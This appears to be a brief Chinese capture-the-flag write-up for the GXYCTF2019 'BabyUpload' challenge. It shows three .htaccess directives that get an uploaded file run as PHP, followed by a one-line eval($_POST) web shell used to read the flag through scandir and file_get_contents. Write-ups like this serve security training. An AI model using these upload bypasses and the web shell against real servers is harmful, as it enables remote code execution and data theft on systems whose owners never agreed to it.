web | [GXYCTF2019]BabyUpload

文件上传的题目，环境是php+apache
通过.htaccess绕过。

这里有几种方式：

# way1
AddType application/x-httpd-php .png
# way2
.htaccess
php_value auto_append_file .htaccess
#<?php phpinfo();
#way3
SetHandler application/x-httpd-php

然后上传phtml格式的木马：

<script language='php'>eval($_POST[mz]);</script>

查了一下phpinfo，没有ban很多函数。
直接scandir+file_get_contents带走。
over.